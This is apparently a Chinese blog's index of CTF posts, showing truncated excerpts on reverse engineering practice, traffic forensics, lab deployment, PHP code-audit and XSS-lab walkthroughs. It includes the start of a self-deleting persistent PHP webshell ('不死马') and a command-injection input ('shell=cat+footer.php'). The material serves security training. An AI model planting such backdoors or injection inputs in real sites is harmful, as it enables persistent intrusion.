随笔分类 -  CTF

摘要:> 练习IDA两年半 打开尘封已久的bugku,从题目中练习使用,现在都已经是新版本了 orz![image.png](https://springbird3.oss-cn-chengdu.aliyuncs.com/lianxiang//20230821_2127155556.png) ### 入门 阅读全文
posted @ 2023-08-21 21:37 春告鳥 阅读(205) 评论(0) 推荐(0) 编辑
摘要:转发自小学弟的WP,有两个取证类的题目因为电脑volatility的问题就没有写在题解里了 题目资源 题目中的流量文件都放到公众号芸潘了,后台回复陇剑杯即可获得下载链接 签到题 使用wireshark打开下载下来的‘Good.pcapng’流量包 1.1此时正在进行的可能是__协议的网络攻击(htt 阅读全文
posted @ 2021-10-01 00:05 春告鳥 阅读(2406) 评论(0) 推荐(0) 编辑
摘要:电话面试之后微信上发了四个靶场过来,做了三个靶场,记录获取flag的过程 第一题 (考点:命令执行) 浏览网站,在底部发现提示 看来是命令执行,执行一下ipconfig 执行成功,抓包继续执行ls 尝试读取footer.php shell=cat+footer.php,无回显 不确定是cat还是空格 阅读全文
posted @ 2021-01-09 02:32 春告鳥 阅读(3097) 评论(4) 推荐(0) 编辑
摘要:关于简单部署题目请参考:https://www.cnblogs.com/Cl0ud/p/13783325.html 如果需要进行较复杂部署,可参考本篇 PHP代码审计系列题目的部署,较之前的部署方案,改变的地方除了题目代码之外,还将题目权限进行了限制,题目结构更正规化,基础镜像没有进行修改,还是原来 阅读全文
posted @ 2020-11-22 01:29 春告鳥 阅读(1202) 评论(0) 推荐(0) 编辑
摘要:部署如DVWA或upload-labs这类综合性靶场的时候,虽然是使用Docker环境,设置好权限后容器被击穿的问题不需要考虑,但担心部分选手修改了题目环境,比如一直XSS弹窗,所以想要编写脚本每天定时刷新靶场,让靶场的可维护性更高。 第一时间想到的是使用Linux下的crontab定时任务加she 阅读全文
posted @ 2020-11-08 01:07 春告鳥 阅读(902) 评论(0) 推荐(0) 编辑
摘要:非常规USB流量分析 附件下载: 链接:https://pan.baidu.com/s/1Gjgj1EH9qmX0PYi21uYlDg 提取码:x9xn 先提取USB流量数据,使用工具: https://github.com/WangYihang/UsbKeyboardDataHacker 得到数据 阅读全文
posted @ 2020-11-05 00:37 春告鳥 阅读(643) 评论(2) 推荐(0) 编辑
摘要:给实验室同学搭建的CTFD平台用于内部训练和CTF的校赛,为了循序渐进当然是先内部出一些简单入门的题目,但是网上大部分关于CTFD平台的都只是部署,而关于题目放置的内容却很少,虽然这个过程比较简单,但还是记录一下 部署自制题目一共分为以下几步(以WEB题目为例,实际上如果是逆向,杂项,密码学这些不需 阅读全文
posted @ 2020-10-08 23:47 春告鳥 阅读(4852) 评论(0) 推荐(1) 编辑
摘要:在某场比赛中师傅们说需要用到该工具,学习之 题目给了我们一个流量包,分析 发现 .hint.php.swp文件 该文件是使用 vim 编辑文件时异常退出而产生的,可以通过 vim -r 文件名 进行相应的恢复,但在这里我们直接跟踪流向下看 存在提示: You need to get two pass 阅读全文
posted @ 2020-10-02 17:00 春告鳥 阅读(1602) 评论(0) 推荐(0) 编辑
摘要:开学后实验室来了几个新同学,在线上CTF方面大家一直在持续学习,但AWD模式的CTF我们练习并不多,所以准备搭建一个AWD平台用于实验室成员的线下赛攻防练习。 最开始的是防灾科技大学的线下AWD靶场: https://github.com/glzjin/20190511_awd_docker 但是靶 阅读全文
posted @ 2020-09-13 20:14 春告鳥 阅读(2891) 评论(0) 推荐(1) 编辑
摘要:工具下载: Linux环境 apt-get install volatility 各种依赖的安装,(视情况安装) #Distorm3:牛逼的反编译库 pip install distorm3 ​ #Yara:恶意软件分类工具 pip install yara ​ #PyCrypto:加密工具集 pi 阅读全文
posted @ 2020-09-10 21:47 春告鳥 阅读(1529) 评论(0) 推荐(0) 编辑
摘要:一个简单的不死马如: <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.3.php'; $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325 阅读全文
posted @ 2020-09-06 02:51 春告鳥 阅读(5809) 评论(3) 推荐(1) 编辑
摘要:CTF SHOW平台的WEB AK赛: 签到_观己 <?php ​ if(isset($_GET['file'])){ $file = $_GET['file']; if(preg_match('/php/i', $file)){ die('error'); }else{ include($file 阅读全文
posted @ 2020-08-23 14:02 春告鳥 阅读(679) 评论(0) 推荐(0) 编辑
摘要:16-20关 第十六关 关键代码为: <?php ini_set("display_errors", 0); $str = strtolower($_GET["keyword"]); $str2=str_replace("script"," ",$str); $str3=str_replace(" 阅读全文
posted @ 2020-08-16 17:44 春告鳥 阅读(253) 评论(0) 推荐(0) 编辑
摘要:查看关键代码: <?php ini_set("display_errors", 0); $str = $_GET["keyword"]; $str00 = $_GET["t_sort"]; $str11=$_SERVER['HTTP_REFERER']; $str22=str_replace(">" 阅读全文
posted @ 2020-08-12 10:02 春告鳥 阅读(247) 评论(0) 推荐(0) 编辑
摘要:以前囫囵吞枣做过一遍,现在从头再来 第一关网址为:http://127.0.0.1/xss-labs-master/level1.php?name=test 而页面上显示了用户test,name可控,查看其源代码为 echo "<h2 align=center>欢迎用户".$str."</h2>"; 阅读全文
posted @ 2020-08-06 22:32 春告鳥 阅读(322) 评论(0) 推荐(0) 编辑
摘要:30题利用提交数组绕过逻辑 本篇博客是PHP代码审计分段讲解系列题解的最后一篇,对于我这个懒癌患者来说,很多事情知易行难,坚持下去,继续学习和提高自己。 源码如下: <?php $role = "guest"; $flag = "flag{test_flag}"; $auth = false; if 阅读全文
posted @ 2020-07-28 20:47 春告鳥 阅读(386) 评论(0) 推荐(0) 编辑
摘要:代码审计分段讲解之29题,代码如下: <?php require("config.php"); $table = $_GET['table']?$_GET['table']:"test"; $table = Filter($table); mysqli_query($mysqli,"desc `se 阅读全文
posted @ 2020-07-27 17:02 春告鳥 阅读(253) 评论(0) 推荐(0) 编辑
摘要:28题 <!DOCTYPE html> <html> <head> <title>Web 350</title> <style type="text/css"> body { background:gray; text-align:center; } </style> </head> <body> 阅读全文
posted @ 2020-07-26 13:08 春告鳥 阅读(280) 评论(0) 推荐(0) 编辑
摘要:后面的题目相对于之前的题目难度稍微提升了一些,所以对每道题进行单独的分析 27题 <?php if(!$_GET['id']) { header('Location: index.php?id=1'); exit(); } $id=$_GET['id']; $a=$_GET['a']; $b=$_G 阅读全文
posted @ 2020-07-15 16:43 春告鳥 阅读(387) 评论(0) 推荐(0) 编辑
摘要:26 unserialize()序列化 <!-- 题目:http://web.jarvisoj.com:32768 --> <!-- index.php --> <?php require_once('shield.php'); $x = new Shield(); isset($_GET['cla 阅读全文
posted @ 2020-07-15 11:00 春告鳥 阅读(351) 评论(0) 推荐(0) 编辑